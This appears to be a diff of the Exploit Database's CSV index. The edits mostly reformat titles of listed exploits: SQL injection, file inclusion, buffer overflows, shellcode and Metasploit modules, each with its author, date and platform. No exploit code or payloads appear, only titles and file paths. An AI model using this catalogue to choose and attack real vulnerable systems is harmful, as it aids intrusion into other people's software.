15611,platforms/multiple/webapps/15611.txt,"JDownloader Webinterface Source Code Disclosure Vulnerability",2010-11-25,Sil3nt_Dre4m,multiple,webapps,0 15611,platforms/multiple/webapps/15611.txt,"JDownloader Webinterface - Source Code Disclosure Vulnerability",2010-11-25,Sil3nt_Dre4m,multiple,webapps,0
15612,platforms/php/webapps/15612.txt,"SiteEngine <= 7.1 - SQL Injection Vulnerability",2010-11-25,Beach,php,webapps,0 15612,platforms/php/webapps/15612.txt,"SiteEngine <= 7.1 - SQL Injection Vulnerability",2010-11-25,Beach,php,webapps,0
15613,platforms/windows/dos/15613.py,"NCH Officeintercom <= 5.20 - Remote Denial of Service Vulnerability",2010-11-25,"xsploited security",windows,dos,0 15613,platforms/windows/dos/15613.py,"NCH Officeintercom <= 5.20 - Remote Denial of Service Vulnerability",2010-11-25,"xsploited security",windows,dos,0
15615,platforms/php/webapps/15615.html,"frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15615,platforms/php/webapps/15615.html,"Frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0
15616,platforms/arm/shellcode/15616.c,"Linux/ARM - add root user with password - 151 bytes",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - add root user with password - 151 bytes",2010-11-25,"Jonathan Salwan",arm,shellcode,0
15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0
15618,platforms/osx/shellcode/15618.c,"OSX/Intel - setuid shell x86_64 - 51 bytes",2010-11-25,"Dustin Schultz",osx,shellcode,0 15618,platforms/osx/shellcode/15618.c,"OSX/Intel - setuid shell x86_64 - 51 bytes",2010-11-25,"Dustin Schultz",osx,shellcode,0
@ -13732,7 +13732,7 @@ id,file,description,date,author,platform,type,port
15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0 15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0
15812,platforms/php/webapps/15812.txt,"Ypninc Realty Classifieds SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0 15812,platforms/php/webapps/15812.txt,"Ypninc Realty Classifieds SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0
15813,platforms/php/webapps/15813.txt,"IPN Development Handler 2.0 - Multiple Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 15813,platforms/php/webapps/15813.txt,"IPN Development Handler 2.0 - Multiple Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
15814,platforms/php/webapps/15814.txt,"Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 15814,platforms/php/webapps/15814.txt,"Joomla Component com_ponygallery - Remote File Inclusion Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
15815,platforms/php/webapps/15815.txt,"Joomla Component com_adsmanager Remote File Inclusion Vulnerability",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 15815,platforms/php/webapps/15815.txt,"Joomla Component com_adsmanager Remote File Inclusion Vulnerability",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
15816,platforms/php/webapps/15816.txt,"CubeCart <= 3.0.4 - SQL Injection Vulnerability",2010-12-23,Dr.NeT,php,webapps,0 15816,platforms/php/webapps/15816.txt,"CubeCart <= 3.0.4 - SQL Injection Vulnerability",2010-12-23,Dr.NeT,php,webapps,0
15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion Vulnerabilities",2010-12-24,v3n0m,php,webapps,0 15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion Vulnerabilities",2010-12-24,v3n0m,php,webapps,0
@ -13770,7 +13770,7 @@ id,file,description,date,author,platform,type,port
15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0
15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0
15858,platforms/php/webapps/15858.txt,"wordpress 3.0.3 - Stored XSS (IE6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 15858,platforms/php/webapps/15858.txt,"wordpress 3.0.3 - Stored XSS (IE6/7 NS8.1)",2010-12-29,Saif,php,webapps,0
15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server (v 1.10) RETR CMD Denial of Service",2010-12-29,emgent,windows,dos,0 15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - RETR CMD Denial of Service",2010-12-29,emgent,windows,dos,0
15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
@ -13787,7 +13787,7 @@ id,file,description,date,author,platform,type,port
15887,platforms/php/webapps/15887.txt,"ChurchInfo <= 1.2.12 SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0 15887,platforms/php/webapps/15887.txt,"ChurchInfo <= 1.2.12 SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0
15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow Exploit",2011-01-01,anonymous,windows,local,0 15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow Exploit",2011-01-01,anonymous,windows,local,0
15889,platforms/php/webapps/15889.txt,"Sahana Agasti <= 0.6.4 - SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0 15889,platforms/php/webapps/15889.txt,"Sahana Agasti <= 0.6.4 - SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0
15890,platforms/php/webapps/15890.txt,"Tech Shop Technote 7 SQL Injection Vulnerability",2011-01-01,MaJ3stY,php,webapps,0 15890,platforms/php/webapps/15890.txt,"Tech Shop Technote 7 - SQL Injection Vulnerability",2011-01-01,MaJ3stY,php,webapps,0
15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
15893,platforms/php/webapps/15893.py,"amoeba CMS 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0 15893,platforms/php/webapps/15893.py,"amoeba CMS 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0
@ -13898,7 +13898,7 @@ id,file,description,date,author,platform,type,port
16044,platforms/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 16044,platforms/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
16047,platforms/php/webapps/16047.txt,"PHPDirector Game Edition (game.php) SQL Injection Vulnerability",2011-01-26,"AtT4CKxT3rR0r1ST ",php,webapps,0 16047,platforms/php/webapps/16047.txt,"PHPDirector Game Edition (game.php) SQL Injection Vulnerability",2011-01-26,"AtT4CKxT3rR0r1ST ",php,webapps,0
16110,platforms/php/webapps/16110.txt,"reos 2.0.5 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 16110,platforms/php/webapps/16110.txt,"reos 2.0.5 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0
16049,platforms/php/webapps/16049.txt,"AWCM 2.2 final - Local File Inclusion Vulnerability",2011-01-26,Cucura,php,webapps,0 16049,platforms/php/webapps/16049.txt,"AWCM 2.2 Final - Local File Inclusion Vulnerability",2011-01-26,Cucura,php,webapps,0
16050,platforms/php/webapps/16050.txt,"class.upload.php 0.30 - Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0 16050,platforms/php/webapps/16050.txt,"class.upload.php 0.30 - Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0
16051,platforms/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion Vulnerbility",2011-01-26,DIES3L,php,webapps,0 16051,platforms/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion Vulnerbility",2011-01-26,DIES3L,php,webapps,0
16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0
@ -14514,7 +14514,7 @@ id,file,description,date,author,platform,type,port
16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,metasploit,windows,remote,0
16711,platforms/windows/remote/16711.rb,"EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,metasploit,windows,remote,0 16711,platforms/windows/remote/16711.rb,"EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,metasploit,windows,remote,0
16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 Format String",2010-06-22,metasploit,windows,remote,21 16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 Format String",2010-06-22,metasploit,windows,remote,21
16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g MKD Command Buffer Overflow",2011-02-23,metasploit,windows,remote,0 16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g - (MKD) Command Buffer Overflow",2011-02-23,metasploit,windows,remote,0
16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (Win32)",2010-10-05,metasploit,windows,remote,2100 16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (Win32)",2010-10-05,metasploit,windows,remote,2100
16715,platforms/windows/remote/16715.rb,"Serv-U FTPD MDTM Overflow",2010-09-20,metasploit,windows,remote,21 16715,platforms/windows/remote/16715.rb,"Serv-U FTPD MDTM Overflow",2010-09-20,metasploit,windows,remote,21
16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,metasploit,windows,remote,0 16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,metasploit,windows,remote,0
@ -14720,7 +14720,7 @@ id,file,description,date,author,platform,type,port
16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,metasploit,linux,remote,0 16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,metasploit,linux,remote,0
16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,metasploit,linux,remote,0 16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,metasploit,linux,remote,0
16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0 16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0
16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0 16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0
16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,metasploit,hardware,webapps,0 16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,metasploit,hardware,webapps,0
16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,metasploit,linux,remote,0 16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,metasploit,linux,remote,0
16925,platforms/linux/remote/16925.rb,"Exim4 <= 4.69 - string_format Function Heap Buffer Overflow",2010-12-16,metasploit,linux,remote,0 16925,platforms/linux/remote/16925.rb,"Exim4 <= 4.69 - string_format Function Heap Buffer Overflow",2010-12-16,metasploit,linux,remote,0
@ -14925,7 +14925,7 @@ id,file,description,date,author,platform,type,port
17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0
17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - (.zip File) Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - (.zip File) Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0
17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection Vulnerability",2011-04-11,R3d-D3V!L,php,webapps,0 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection Vulnerability",2011-04-11,R3d-D3V!L,php,webapps,0
17147,platforms/linux/local/17147.txt,"tmux - '-S' Option Incorrect SetGID Privilege Escalation Vulnerability",2011-04-11,ph0x90bic,linux,local,0 17147,platforms/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation Vulnerability",2011-04-11,ph0x90bic,linux,local,0
17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,metasploit,multiple,remote,10001 17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,metasploit,multiple,remote,10001
17149,platforms/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",2011-04-09,metasploit,windows,remote,0 17149,platforms/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",2011-04-09,metasploit,windows,remote,0
17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 RTX Buffer Overflow",2011-04-08,metasploit,windows,local,0 17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 RTX Buffer Overflow",2011-04-08,metasploit,windows,local,0
@ -14976,7 +14976,7 @@ id,file,description,date,author,platform,type,port
17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injection Vulnerabilities",2011-04-22,^Xecuti0N3r,php,webapps,0 17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injection Vulnerabilities",2011-04-22,^Xecuti0N3r,php,webapps,0
17207,platforms/php/webapps/17207.txt,"ajax category dropdown wordpress plugin 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17207,platforms/php/webapps/17207.txt,"ajax category dropdown wordpress plugin 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0
17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 SQL Injection Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 SQL Injection Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0
17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 - (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0
17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0 17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0
17214,platforms/php/webapps/17214.php,"WordPress SermonBrowser Plugin 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 17214,platforms/php/webapps/17214.php,"WordPress SermonBrowser Plugin 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0
17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0 17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0
@ -15759,7 +15759,7 @@ id,file,description,date,author,platform,type,port
18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0 18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0
18148,platforms/php/webapps/18148.pl,"PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 18148,platforms/php/webapps/18148.pl,"PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0
18149,platforms/php/webapps/18149.php,"PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit",2011-11-23,EgiX,php,webapps,0 18149,platforms/php/webapps/18149.php,"PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit",2011-11-23,EgiX,php,webapps,0
18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0
18153,platforms/cgi/webapps/18153.txt,"LibLime Koha <= 4.2 - Local File Inclusion Vulnerability",2011-11-24,"Akin Tosunlar",cgi,webapps,0 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha <= 4.2 - Local File Inclusion Vulnerability",2011-11-24,"Akin Tosunlar",cgi,webapps,0
18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH - sh4 - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH - sh4 - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0
18155,platforms/php/webapps/18155.txt,"Zabbix <= 1.8.4 (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 18155,platforms/php/webapps/18155.txt,"Zabbix <= 1.8.4 (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0
@ -15852,7 +15852,7 @@ id,file,description,date,author,platform,type,port
18276,platforms/php/webapps/18276.txt,"Wordpress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 18276,platforms/php/webapps/18276.txt,"Wordpress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0
18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script Arbitrary File Upload Vulnerability",2011-12-26,ySecurity,php,webapps,0 18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script Arbitrary File Upload Vulnerability",2011-12-26,ySecurity,php,webapps,0
18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups Local Buffer Overflow PoC",2011-12-26,"Stefan Schurtz",linux,dos,0 18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups Local Buffer Overflow PoC",2011-12-26,"Stefan Schurtz",linux,dos,0
18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid: Remote Root function pointer overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0
18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit metasploit",2011-12-27,"Fady Mohammed Osman",windows,remote,0 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit metasploit",2011-12-27,"Fady Mohammed Osman",windows,remote,0
18412,platforms/php/webapps/18412.php,"Wordpress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 18412,platforms/php/webapps/18412.php,"Wordpress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0
18287,platforms/php/webapps/18287.php,"Joomla Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps,0 18287,platforms/php/webapps/18287.php,"Joomla Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps,0
@ -16415,11 +16415,11 @@ id,file,description,date,author,platform,type,port
19026,platforms/windows/remote/19026.rb,"Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,metasploit,windows,remote,0 19026,platforms/windows/remote/19026.rb,"Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,metasploit,windows,remote,0
18997,platforms/php/webapps/18997.php,"Wordpress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18997,platforms/php/webapps/18997.php,"Wordpress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0
18998,platforms/php/webapps/18998.php,"Wordpress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18998,platforms/php/webapps/18998.php,"Wordpress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0
18999,platforms/php/webapps/18999.php,"SN News (visualiza.php) <= 1.2 - SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 18999,platforms/php/webapps/18999.php,"SN News <= 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0
19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service Vulnerability",2012-06-06,Onying,windows,dos,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service Vulnerability",2012-06-06,Onying,windows,dos,0
19012,platforms/php/webapps/19012.txt,"Wordpress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 19012,platforms/php/webapps/19012.txt,"Wordpress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0
19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure Vulnerability",2012-06-08,"Sammy FORGIT",php,webapps,0 19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure Vulnerability",2012-06-08,"Sammy FORGIT",php,webapps,0
19005,platforms/php/webapps/19005.txt,"SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 19005,platforms/php/webapps/19005.txt,"SN News <= 1.2 - (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0
19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - (.PAC) Exploit",2012-06-07,b33f,windows,local,0 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - (.PAC) Exploit",2012-06-07,b33f,windows,local,0
19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,metasploit,windows,remote,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,metasploit,windows,remote,0
19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Stored XSS",2012-06-06,"Henry Hoggard",php,webapps,0 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Stored XSS",2012-06-06,"Henry Hoggard",php,webapps,0
@ -16882,7 +16882,7 @@ id,file,description,date,author,platform,type,port
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0
19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0
19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow",2012-07-01,metasploit,windows,local,0 19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow",2012-07-01,metasploit,windows,local,0
19520,platforms/bsd/remote/19520.txt,"BSD telnetd Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0 19520,platforms/bsd/remote/19520.txt,"BSD telnetd Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0
@ -25617,7 +25617,7 @@ id,file,description,date,author,platform,type,port
28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0 28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0
28561,platforms/multiple/dos/28561.pl,"Blast XPlayer Local Buffer Overflow PoC",2013-09-26,flux77,multiple,dos,0 28561,platforms/multiple/dos/28561.pl,"Blast XPlayer Local Buffer Overflow PoC",2013-09-26,flux77,multiple,dos,0
28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability",2013-09-26,"Hubert Gradek",hardware,webapps,0 28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability",2013-09-26,"Hubert Gradek",hardware,webapps,0
28563,platforms/multiple/webapps/28563.txt,"posnic stock management system 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0 28563,platforms/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0
28564,platforms/php/webapps/28564.txt,"ArticleSetup Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0 28564,platforms/php/webapps/28564.txt,"ArticleSetup Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0
